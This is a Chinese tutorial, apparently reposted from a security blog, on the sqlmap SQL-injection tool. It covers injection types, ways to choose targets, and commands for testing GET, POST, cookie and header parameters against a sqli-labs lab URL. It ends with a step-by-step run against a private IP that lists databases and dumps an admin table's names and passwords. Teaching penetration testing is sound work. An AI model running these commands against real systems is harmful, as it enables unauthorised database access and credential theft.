sqlmap支持的数据库
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆查询注入,可以同时执行多条语句的执行时的注入。
sqlmap获取目标方式
1.指定目标urlsqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"2.从文件中获取多个urlsqlmap -m 1.txt3.从文件中加载HTTP请求sqlmap -r url.txt4.利用google获取目标sqlmap - g inurl : php? id=5.从burp日志中获取目标sqlmap -l burp.txt
实例演示-sqlmap注入检测
1.GET参数注入
sqlmap -u "url/?id=1"
2.POST参数注入
sqlmap -u "url" --data="id=1"
3.cookie注入 (level>=2时才会检测cookie)
sqlmap -u "url" –cookie "id=11" –level 2
4.user-agent注入
sqlmap -u "url" --level 3
5.referer注入
sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 3
如图,用 * 号指定referer,这样就可以检测referer。
6.host注入
sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 5
一般流程
1、跑注入点:sqlmap.py -u "http://172.16.5.200:81/Index.aspx?id=1" --batch2、跑所有库名sqlmap.py -u "http://172.16.5.200:81/Index.aspx?id=1" --batch --dbs3、跑当前数据库sqlmap.py -u "http://172.16.5.200:81/Index.aspx?id=1" --batch --current-db4、跑所有表sqlmap.py -u "http://172.16.5.200:81/Index.aspx?id=1" --batch -D cimer --tables5、跑所有字段sqlmap.py -u "http://172.16.5.200:81/Index.aspx?id=1" --batch -D cimer -T admin --columns6、跑字段值sqlmap.py -u "http://172.16.5.200:81/Index.aspx?id=1" --batch -D cimer -T admin -C name,password --dump
文章转载自笙临天下 Sec,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
